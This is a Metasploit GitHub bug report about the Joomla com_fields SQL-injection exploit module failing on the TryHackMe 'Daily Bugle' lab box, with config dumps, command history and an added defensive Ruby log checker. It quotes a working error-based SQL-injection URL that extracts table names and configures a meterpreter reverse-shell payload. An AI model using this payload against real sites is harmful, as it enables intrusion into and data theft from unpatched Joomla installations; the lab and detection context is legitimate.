Open cgranleese-r7 opened 4 years ago
Hey future @cgranleese-r7, we need an issue template filled out properly!
When creating an issue, please ensure that the default issue template has been updated with the required details.
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
The problem could be that the database on TryHackMe does not know `TO_BASE64`. See:
http://10.10.147.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(2170,CONCAT(0x2e,0x6942465a70,(SELECT%20MID((IFNULL(CAST(TO_BASE64(table_name)%20AS%20CHAR),0x20)),1,22)%20FROM%20information_schema.tables%20order%20by%20update_time%20DESC%20LIMIT%201),0x5359595a48),4879))
`TO_BASE64` was introduced with MySQL 5.6; on the box you have 5.5.64-MariaDB.
Results in:
`500 FUNCTION joomla.TO_BASE64 does not exist`
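An added example, not part of the comment above or of Metasploit's code: a defender-side check in Ruby that flags requests of this shape in web-server access logs by validating `list[fullordering]` against an allowlist pattern. The log lines, client addresses and all constant and method names are constructed for illustration, and the injected value is abridged with `...`.

```ruby
require 'uri'

# A legitimate ordering value is a column name plus an optional direction.
SAFE_ORDERING = /\A[\w.]+(\s+(asc|desc))?\z/i
# Tokens typical of error-based extraction; reported for triage, not used to decide.
SQL_TOKENS = /\b(updatexml|extractvalue|select|concat|information_schema)\b/i
REQUEST = %r{\A(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})}

# Returns nil for a line of no interest, otherwise a hash describing the request.
def inspect_line(line)
  m = REQUEST.match(line)
  return nil unless m
  query = m[2].split('?', 2)[1]
  return nil unless query
  begin
    params = URI.decode_www_form(query).to_h
  rescue ArgumentError
    return nil # malformed percent-encoding; out of scope for this check
  end
  return nil unless params['option'] == 'com_fields'
  value = params['list[fullordering]']
  return nil if value.nil? || value.empty? || SAFE_ORDERING.match?(value)
  {
    client: m[1],
    status: m[3].to_i,
    tokens: value.scan(SQL_TOKENS).flatten.map(&:downcase).uniq,
    # A 500 matches the "FUNCTION ... does not exist" response quoted above.
    db_error_likely: m[3] == '500'
  }
end

def suspicious_requests(lines)
  lines.map { |l| inspect_line(l) }.compact
end

# Constructed sample lines in combined log format (documentation address ranges).
SAMPLE_LOG = [
  '203.0.113.7 - - [17/Sep/2020:05:40:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [17/Sep/2020:05:40:09 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [17/Sep/2020:05:47:14 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(2170,CONCAT(0x2e,(SELECT%20...)),4879)) HTTP/1.1" 500 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
].freeze

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each { |hit| puts hit.inspect }
end
```

The decision rests on the allowlist, so a value that avoids the listed tokens is still flagged; the token list only helps an analyst sort hits.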
Steps to reproduce
How'd you do it?
Yea, it failed and returned - Error retrieving table prefix
Were you following a specific guide/tutorial or reading documentation?
https://tryhackme.com/room/dailybugle
Expected behavior
What should happen? Return a reverse shell
Current behavior
What happens instead? It returns Error retrieving table prefix
Metasploit version
Framework: 5.0.101-dev
Additional Information
If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.
If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outside `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
```
[framework/ui/console]
ActiveModule=exploit/unix/webapp/joomla_comfields_sqli_rce
[unix/webapp/joomla_comfields_sqli_rce]
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=10.10.180.131
RPORT=80
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpPartialResponses=false
HttpTrace=true
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
FileDropperDelay=
TARGETURI=/
PAYLOAD=php/meterpreter/reverse_tcp
LHOST=10.11.16.15
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
```
History
The following commands were run during the session and before this issue occurred:
```
221 search joomla
222 use 9
223 options
224 set RHOSTS 10.10.180.131
225 options
226 run
227 set httptrace true
228 run
229 search joomla
230 search joomla type:exploit
231 use 2
232 options
233 set RHOSTS 10.10.180.131
234 ip a
235 set LHOST 10.11.16.15
236 options
237 run
238 search joomla
239 search joomla type:exploit
240 use 5
241 options
242 set RHOSTS 10.10.180.131
243 set USERNAME jonah
244 set LHOST 10.11.16.15
245 options
246 set TARGETuRI /
247 set PASSWORD *****
248 run
249 set HTTPTRACE true
250 options
251 run
252 info -d
253 search joomla type:exploit
254 use 2
255 options
256 run
257 set HTTPTRACE true
258 run
259 edit
260 run
261 --version
262 version
263 debug
```
Errors
The following errors occurred before the issue occurred:
```
[09/17/2020 05:47:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
```
Logs
The following logs were recorded before the issue occurred:
```
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
```
Version/Install
The versions and install method of your Metasploit setup:
```
Framework: 5.0.101-dev
Ruby: ruby 2.7.0p0 (2019-12-25 revision 647ee6f091) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```